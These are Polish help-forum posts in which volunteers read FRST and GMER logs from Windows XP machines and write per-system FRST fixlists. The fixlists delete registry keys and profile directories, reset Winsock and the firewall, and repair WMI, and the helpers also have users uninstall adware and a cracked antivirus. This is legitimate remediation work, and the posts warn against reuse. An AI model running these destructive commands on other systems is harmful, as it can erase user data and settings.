found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll" GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = URLSearchHook: HKU\S-1-5-21-1417001333-746137067-839522115-1004 - (No Name) - {bfc39e47-d643-4dc2-aa1d-61377501c844} - No File Toolbar: HKU\.DEFAULT -> No Name - {2E924F4F-67F0-4BD8-9560-49F468E843D2} - No File Handler: vnd.ms.radio - {3DA2AA3B-3D96-11D2-9BD2-204C4F4F5020} - C:\WINDOWS\system32\Msdxm6.ocx (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1417001333-746137067-839522115-1004_Classes\CLSID\{6835F21B-AD12-485C-A8FD-D7DF60C72A69}\InprocServer32 -> wbocx32.ocx No File CustomCLSID: HKU\S-1-5-21-1417001333-746137067-839522115-1004_Classes\CLSID\{6AC91CBD-DB47-406A-AF60-90F8150FA5B8}\InprocServer32 -> wbocx32.ocx No File FF Plugin: @videolan.org/vlc,version=0.8.6h -> C:\Program Files\VideoLAN\VLC\npvlc.dll No File FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension C:\Documents and Settings\All Users\Dane aplikacji\Common Files C:\Documents and Settings\All Users\Dane aplikacji\InstallMate C:\Documents and Settings\All Users\Dane aplikacji\Microsoft\Secure C:\Documents and Settings\All Users\Dane aplikacji\PPLive C:\Documents and Settings\All Users\Dane aplikacji\SecuriSoft SARL C:\Documents and Settings\Jarek\Dane aplikacji\*.exe C:\Documents and Settings\Jarek\Dane aplikacji\.BitTornado C:\Documents and Settings\Jarek\Dane aplikacji\addpcs C:\Documents and Settings\Jarek\Dane aplikacji\Aguhxyro C:\Documents and Settings\Jarek\Dane aplikacji\atube C:\Documents and Settings\Jarek\Dane aplikacji\DAEMON Tools Lite C:\Documents and Settings\Jarek\Dane aplikacji\DMCache C:\Documents and Settings\Jarek\Dane aplikacji\FrameworkUpdate C:\Documents and Settings\Jarek\Dane aplikacji\iliveto C:\Documents and Settings\Jarek\Dane aplikacji\Moyea C:\Documents and Settings\Jarek\Dane aplikacji\Opera Software C:\Documents and Settings\Jarek\Dane aplikacji\PPLive C:\Documents and Settings\Jarek\Dane aplikacji\Publish Providers C:\Documents and Settings\Jarek\Dane aplikacji\Warez C:\Documents and Settings\Jarek\Dane aplikacji\WebCompiler3 C:\Documents and Settings\Jarek\Dane aplikacji\Xi C:\Documents and Settings\Jarek\Dane aplikacji\Ylgyas C:\Documents and Settings\Jarek\Dane aplikacji\Yzwexupa C:\Documents and Settings\Jarek\Pulpit\Icons\Programs\1\DAEMON Tools Pro.lnk C:\Documents and Settings\Jarek\Pulpit\Icons\Programs\1\YASU.exe.lnk C:\Documents and Settings\Jarek\Ustawienia lokalne\Dane aplikacji\~wmrg C:\Documents and Settings\Jarek\Ustawienia lokalne\Dane aplikacji\Google\Chrome C:\Documents and Settings\Jarek\Ustawienia lokalne\Dane aplikacji\Ektion C:\Documents and Settings\Jarek\Ustawienia lokalne\Dane aplikacji\Otsics C:\Program Files\Mozilla Firefox\extensions C:\Program Files\mozilla firefox\plugins C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension C:\WINDOWS\system32\deurge.exe C:\WINDOWS\system32\klogon.dll Reg: reg delete "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Search Bar" /f Reg: reg delete "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Search Page" /f Reg: reg delete "HKCU\Software\Microsoft\Internet Explorer\Main" /v SearchMigratedDefaultName /f Reg: reg delete "HKCU\Software\Microsoft\Internet Explorer\Main" /v SearchMigratedDefaultURL /f Reg: reg delete "HKCU\Software\Microsoft\Internet Explorer\Search" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Internet Explorer\Search" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f CMD: netsh winsock reset CMD: dir /a "C:\Documents and Settings\Jarek\Ustawienia lokalne\Dane aplikacji" CMD: dir /a C:\WINDOWS\$NtUninstallKB34492$ Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Z POZIOMU TRYBU NORMALNEGO: Jeśli wszystko pójdzie dobrze, system powinien poprawnie się uruchomić. Kolejne działania: 1. Przez Dodaj/Usuń programy odinstaluj stare dziurawe wersje Adobe Flash Player 13 ActiveX, Adobe Flash Player 15 Plugin, Java 7 Update 67, Java™ 6 Update 5, Java™ 6 Update 7 oraz scrackowany ESET NOD32 Antivirus + NOD32 v3.0.642 FiX1.2 by TemDono. 2. Wyczyść Firefox: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj program Firefox. Zakładki i hasła nie zostaną naruszone, ale używane rozszerzenia trzeba będzie potem przeinstalować. 3. Zrób nowe logi: FRST z opcji Scan (zaznacz ponownie pole Addition, by powstały dwa logi) oraz GMER. Dołącz też plik fixlog.txt.

Nazwy logów sugerują, że wyciągasz je z folderu C:\FRST\Logs. Tam jest archiwum, bieżący log jest zawsze w ścieżce z której uruchamiano FRST, czyli w tym przypadku na Pulpicie. Przeprowadź następujące działania: 1. Odinstaluj odpadki, stare wersje (potem będziemy instalować najnowsze) oraz instalacje sponsorowane: - Przez Dodaj/Usuń programy: Adobe Flash Player 15 ActiveX, Adobe Flash Player 15 Plugin, BitTorrentControl_v12 Toolbar, Java 7 Update 21, McAfee Security Scan Plus. - Uruchom narzędzie Microsoftu: KLIK. Zaakceptuj > Wykryj problemy i pozwól mi wybrać poprawki do zastosowania > Odinstalowywanie > zaznacz na liście odpadkowy wpis Google Update Helper > Dalej. 2. Wyczyść Firefox z adware: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj program Firefox. Zakładki i hasła nie zostaną naruszone. 3. Otwórz Notatnik i wklej w nim: CloseProcesses: GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction HKLM\SOFTWARE\Microsoft\Internet Explorer\AboutURLs,Tabs: "http://www.interia.pl/?utm_source=is" FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.) FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.) Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe HKU\S-1-5-21-1343024091-1336601894-839522115-1003\...\Run: [bgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] => "C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe" S1 ccnfd_1_10_0_4; system32\drivers\ccnfd_1_10_0_4.sys [X] U1 eabfiltr; No ImagePath S3 NMIndexingService; "C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe" [X] S2 Update Faster Light; "C:\Program Files\Faster Light\updateFasterLight.exe" [X] C:\Documents and Settings\All Users\Dane aplikacji\AVG C:\Documents and Settings\All Users\Dane aplikacji\Avg_Update_0814tb C:\Documents and Settings\All Users\Dane aplikacji\Common Files C:\Documents and Settings\All Users\Dane aplikacji\TEMP C:\Documents and Settings\All Users\Menu Start\Programy\Lightworks C:\Documents and Settings\Martyna1\Dane aplikacji\AVG C:\Documents and Settings\Martyna1\Dane aplikacji\IHlpr C:\Documents and Settings\Martyna1\Ustawienia lokalne\Dane aplikacji\Avg C:\Documents and Settings\Martyna1\Ustawienia lokalne\Dane aplikacji\WMTools Downloaded Files C:\Documents and Settings\LocalService\Dane aplikacji\AVG C:\Documents and Settings\LocalService\Ustawienia lokalne\Dane aplikacji\AVG C:\Program Files\Firefox(13108)-dp.exe C:\Program Files\Google Reg: reg delete HKCU\Software\Google /f Reg: reg delete HKLM\SOFTWARE\Google /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f CMD: sc config "PLAY ONLINE. RunOuc" start= disabled EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

Wszystko zrobione. Nie odpowiedziałeś mi na pytanie:

W jaki sposób? Opisz na czym polega "fatalne działanie". Ogólnie na razie mogę tylko tyle stwierdzić, że Firefox jest tu dość przeładowany (dużo wtyczek i rozszerzeń zewnętrznych) oraz są jakieś problemy ze strukturą plików na dysku. Temat migruję do działu Windows. Nie ma tu żadnych oznak infekcji, rysują się inne zagadnienia. Do usunięcia tylko puste wpisy, odpadkowe katalogi po deinstalacjach i zbędne nieczynne polityki wprowadzone przez jakieś narzędzie "resetujące", ale to tylko kosmetyka. Widzę tu inne rodzaje poważniejszych nieinfekcyjnych problemów. Po pierwsze, wygląda na to, że jest tu defekt struktury plików (może być konsekwencją ogólnych problemów z dyskiem). Jest kilka śladów to punktujących, tzn. są tworzone replikacje katalogów kont (np. All Users, All Users.WINDOWS ...) i programów z suffiksami numerycznymi (np. potrójne wystąpienie Flashblock) oznaczające utratę dostępu do poprzednich wystąpień, a także te same katalogi są listowane w raporcie podwójnie co jest oznaką nieprawidłowości, np.: 2014-12-27 13:48 - 2014-12-27 13:48 - 00000000 ____D () C:\Documents and Settings\All Users.WINDOWS\Menu Start\Programy\WinRAR 2014-12-27 13:48 - 2014-12-27 13:48 - 00000000 ____D () C:\Documents and Settings\All Users.WINDOWS\Menu Start\Programy\WinRAR Po drugie, Dziennik zdarzeń sypie błędami modułów Foxit i filtra ffdshow, a także sugeruje niespójność Repozytorium WMI: Application errors: ================== Error: (12/24/2014 11:03:50 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Aplikacja powodująca błąd mpc-hc.exe, wersja 1.7.3.147, moduł powodujący błąd ffdshow.ax, wersja 1.3.4530.0, adres błędu 0x0021be27. Przetwarzanie zdarzenia określonego nośnika dla [mpc-hc.exe!ws!] Error: (12/23/2014 08:54:14 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Aplikacja powodująca błąd drwtsn32.exe, wersja 5.1.2600.0, moduł powodujący błąd dbghelp.dll, wersja 5.1.2600.5512, adres błędu 0x0001295d. Przetwarzanie zdarzenia określonego nośnika dla [drwtsn32.exe!ws!] Error: (12/23/2014 08:54:09 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Aplikacja powodująca błąd explorer.exe, wersja 6.0.2900.5512, moduł powodujący błąd foxitpdfinfo.dll, wersja 1.0.0.903, adres błędu 0x0002f7b8. Przetwarzanie zdarzenia określonego nośnika dla [explorer.exe!ws!] Error: (12/22/2014 07:52:08 PM) (Source: SecurityCenter) (EventID: 1802) (User: ) Description: Usługa Centrum zabezpieczeń systemu Windows nie może ustanowić kwerend zdarzeń z WMI, aby monitorować zaporę i program antywirusowy innej firmy. Wstępnie: 1. Wykonaj sprawdzanie dysku: Start > Uruchom > cmd, wklep komendę chkdsk /f /r i ENTER, na pytanie o dezinstalację woluminu odpowiedz twierdząco z klawiatury i zresetuj system. Podczas restartu powinno się wykonać sprawdzanie dysku. Start > Uruchom > eventvwr.msc, w sekcji Aplikacja wyszukaj zdarzenie Winlogon numer 1001, pobierz jego Szczegóły, skopiuj je i wklej do posta. 2. Następnie odinstaluj starą wersję Adobe Flash Player 11 ActiveX oraz programy tworzące błędy Foxit PDF Editor, K-Lite Codec Pack 10.4.0 Full. 3. Otwórz Notatnik i wklej w nim: CloseProcesses: CMD: rundll32 wbemupgd, UpgradeRepository CMD: netsh firewall reset Reg: reg delete HKLM\SOFTWARE\Google /f Reg: reg delete HKU\S-1-5-18\Software\Classes /f Reg: reg delete HKU\S-1-5-19\Software\Classes /f Reg: reg delete HKU\S-1-5-20\Software\Classes /f Reg: reg delete "HKCU\Software\Microsoft\Internet Explorer\MenuExt"/f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Policies /f Reg: reg delete HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Policies /f Reg: reg delete HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Policies /f HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction HKU\S-1-5-21-343818398-1757981266-839522115-1003\Software\Classes\.exe: exefile => "%1" %* HKU\S-1-5-21-343818398-1757981266-839522115-1003\Software\Classes\exefile: "%1" %* DPF: {68282C51-9459-467B-95BF-3C0E89627E55} http://www.mks.com.pl/skaner/SkanerOnline.cab FF Keyword.URL: hxxp://www.google.com.my/search?q= FF DefaultSearchEngine: Google Default FF SearchPlugin: C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\Mozilla\Firefox\Profiles\7f8o4de8.default-1386175172031\searchplugins\google-default.xml FF Plugin: @IObit.com/np_Asc_Plugin -> C:\Program Files\IObit\Surfing Protection\BrowerProtect\np_Asc_plugin.dll No File S4 LiveUpdateSvc; C:\Program Files\IObit\LiveUpdate\LiveUpdate.exe [X] R3 ALSysIO; \??\C:\DOCUME~1\BERGER~2.XP-\USTAWI~1\Temp\ALSysIO.sys [X] S3 cpuz135; \??\C:\DOCUME~1\BERGER~2.XP-\USTAWI~1\Temp\cpuz135\cpuz135_x32.sys [X] S3 cpuz136; \??\C:\DOCUME~1\BERGER~2.XP-\USTAWI~1\Temp\cpuz136\cpuz136_x32.sys [X] S3 gdrv; \??\C:\WINDOWS\gdrv.sys [X] Task: C:\WINDOWS\Tasks\AVG_SYS_TASK.job => C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\AVG 0214c Campaign\AVG-Secure-Search-Update-0214c.exe C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\{3C5CBD7B-3D1D-411E-96C2-513FFCA84D2D} C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\188F1432-103A-4ffb-80F1-36B633C5C9E1 C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\ALLPlayer C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\AVG 0214c Campaign C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\AVG2014 C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\ClearCookiesEasy C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\F-Secure C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\HitmanPro C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\IObit C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\MFAData C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\PITy C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\Simply Super Software C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\TEMP C:\Documents and Settings\All Users.WINDOWS\Dane aplikacji\VSO C:\Documents and Settings\All Users.WINDOWS\Menu Start\Programy\Powertoys for Windows XP\Tweak UI.lnk C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\AVG 0214c Campaign C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\AVG2014 C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\BinarySense C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\BITS C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\ClearCookiesEasy C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\CrystalIdea Software C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\FlashGet C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\FlashGetBHO C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\FlashgetSetup C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\HD Tune Pro C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\IObit C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\KRyLack Archive Password Recovery C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\OpenOffice.org C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\Podatnik.info C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\SolidDocuments C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\Thunderbird C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\TuneUp Software RemoveDirectory: C:\Documents and Settings\All Users RemoveDirectory: C:\Documents and Settings\All Users.WINDOWS1 RemoveDirectory: C:\Documents and Settings\berger RemoveDirectory: C:\Documents and Settings\berger.XP-75CF98363E2C\Recent(2) RemoveDirectory: C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\Mozilla\Firefox\Profiles\7f8o4de8.default-1386175172031\Extensions\{3d7eb24f-2740-49df-8937-200b1cc08f8a}(2) RemoveDirectory: C:\Documents and Settings\berger.XP-75CF98363E2C\Dane aplikacji\Mozilla\Firefox\Profiles\7f8o4de8.default-1386175172031\Extensions\{3d7eb24f-2740-49df-8937-200b1cc08f8a}(3) RemoveDirectory: C:\Documents and Settings\Default User RemoveDirectory: C:\Documents and Settings\Default User.WINDOWS1 CMD: dir /a "C:\Documents and Settings" CMD: dir /a "C:\Documents and Settings\berger.XP-75CF98363E2C\Ustawienia lokalne\Dane aplikacji" EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Start > Uruchom > eventvwr.msc i z prawokliku na sekcje Aplikacja + System wyczyść oba dzienniki. Zresetuj system. 5. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa raporty. Dołącz też plik fixlog.txt.

zubzero0pl, ponawiam prośbę o logi. I opisz w jaki sposób sobie z tym "poradziłeś".

Wszystko nadal aktualne. Logi powyżej usuwam (nie wnoszą nic do sprawy), kompletny obraz uzyskam po przeprowadzeniu podanych akcji.

Akcja wykonana. Skasuj z dysku plik C:\Delfix.txt. Temat rozwiązany. Zamykam.

Wszystko zrobione. AdwCleaner był wcześniej używany, więc ponowne zastosowanie niezasadne. Kończymy: Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK.